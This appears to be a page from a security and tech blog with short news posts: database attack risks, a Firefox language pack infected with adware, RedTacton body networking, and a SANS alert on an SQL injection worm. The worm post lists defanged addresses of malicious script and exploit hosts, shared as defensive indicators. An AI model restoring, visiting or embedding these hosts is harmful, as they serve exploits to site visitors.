Top Six Database Attacks

It takes the average attacker less than 10 seconds to hack in and out of a database — hardly enough time for the database administrator even notice the intruder. So it’s no surprise that many database attacks go unnoticed by organizations until long after the data has been compromised.

And surprisingly, according to many experts, the database — home of the enterprise’s crown jewels — is still not secured properly in many enterprises. Malicious hackers are using shockingly simple attack methods to break into databases, such as exploiting weak passwords and lax configuration, and capitalizing on known vulnerabilities that go unpatched.

And don’t even get us started on the epidemic of missing backup tapes: If the lost or stolen tapes are unencrypted, you’re toast if a bad guy gets hold of them. No hack required.

“One of the biggest problems is that many database attacks are not even known” about, says Noel Yuhanna, principal analyst with The Forrester Group. “The typical database may have 15,000 to 20,000 connections per second. It’s not humanly possible to know what all of these [connections] are doing.”

Hackers are well aware of enterprises’ database patch dilemma — in fact, they’re banking on a backlog. Gone are the days when companies could lock down a handful of databases in the data center: Most organizations today have hundreds, even thousands of databases to configure, secure, and monitor — and remote users, customers, and business partners all need access to them.

“The big thing that bothers me is when I go to a customer’s site, usually their [database] configuration is so weak that it’s easy to exploit. You usually don’t need buffer overflow or SQL injection [attacks] because the initial setup of the database is totally insecure,” says Slavik Markovich, CTO of Sentrigo, a database security vendor.

Database attacks don’t have to be complicated with all of this low-lying fruit hanging around. “Those are basic configuration problems, so a hacker doesn’t have to do something really sophisticated because these easy things work,” Markovich says.

Read the rest of the story…

Posted in Internet, Security | No Comments

Ultimate Boot CD for Windows (UBCD4Win)

UBCD4Win is a bootable recovery CD that contains software used for repairing, restoring, or diagnosing almost any computer problem. Our goal is to be the most complete and easy to use free computer diagnostic tool. Almost all software included in UBCD4Win are freeware utilities for Windows.

Please visit the “List of Tools” page for a complete list of what is included in the latest version of UBCD4Win.

Download here

Posted in Windows | No Comments

Firefox Plugin Shipped With Malicious Code

Mozilla warned Wednesday that a malicious program inserted adware code into a Firefox plugin that has been downloaded thousands of times over the past three months.

Because of a virus infection, the Vietnamese language pack for Firefox 2 was polluted with adware, Mozilla security chief Window Snyder said in a blog posting. “Everyone who downloaded the most recent Vietnamese language pack since February 18, 2008 got an infected copy,” she wrote. “Mozilla does virus scans at upload time but the virus scanner did not catch this issue until several months after the upload.”

Mozilla is now going to add additional scans of its software to prevent this kind of thing from happening in the future, she said.

The malware in the language pack is from the Xorer Trojan, according to discussion on Mozilla’s Bugzilla developer Web site, which indicates that Mozilla developers first discovered the issue on Tuesday.

“I think it (happened) just because the author’s local network was infected with the virus, so it modified HTML files,” wrote developer Hai-Nam Nguyen. “The infected code just display(s) annoying banner but it can’t propagate.”

The open-source browser maker does not know how many people were infected with the adware, but the plugin was downloaded more than 1,200 times in the past week and has been downloaded 16,667 times since November.

On Wednesday afternoon, the Web page for the plugin was off-line as Mozilla scrambled to come up with a new, adware-free version of the language pack. In the meantime, users of the software should disable the plugin, Snyder said.

Source: PC World

Posted in Internet, Security | No Comments

Human Area Networking (HAN)

RedTacton is a new Human Area Networking technology that uses the surface of the human body as a safe, high speed network transmission path.

• Using a new super-sensitive photonic electric field sensor, RedTacton can achieve duplex communication over the human body at a maximum speed of 10 Mbps.
• RedTacton uses the minute electric fieldemitted on the surface of the human body. Technically, it is completely distinct from wireless and infrared.
• A transmission path is formed at the moment a part of the human body comes in contact with a RedTacton transceiver. Physically separating ends the contact and thus ends communication.
• Using RedTacton, communication starts when terminals carried by the user or embedded in devices are linked in various combinations according to the user’s natural, physical movements.
• Communication is possible using any body surfaces, such as the hands, fingers, arms, feet, face, legs or torso. RedTacton works through shoes and clothing as well.

RedTacton Homepage

Posted in General BS, Networking, Privacy, Security | No Comments

SQL Injection Worm on the Loose

A loyal ISC reader, Rob, wrote in to point us at what looks to be a SQL Injection worm that is on the loose.  From a quick google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier.  Right now we can’t speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites.  It looks like the infection of user machines is by Real Player vulnerabilities that seem more or less detected pretty well.

The details, the script source that is injected into webpages is hx xp:// winzipices . cn/#.js (where # is 1-5).  This, in turn, points to a cooresponding asp page on the same server.  (i.e. hx xp:// winzipices . cn /#.asp).  This in turn points back to the exploits.  Either from the cnzz.com domain or the 51(dot)la domain.  The cnzz(dot)com (hxxp://s141.cnzz(dot)com) domain looks like it could be set up for single flux, but it’s the same pool of IP address all the time right now.  hxxp://www.51(dot)la just points to 51la(dot)ajiang(dot)net which has a short TTL, but only one IP is serving it.

Fair warning, if you google this hostnames, you will find exploited sites that will try and reach out and “touch” you… even if you are looking at the “cached” page.  Proceed at your own risk.

UPDATE: We’re also see this website serving up some attacks in connection with this SQL Worm (hxxp://bbs(dot)jueduizuan(dot)com)

Source: SANS

Posted in Coding, Internet, Privacy, Security | No Comments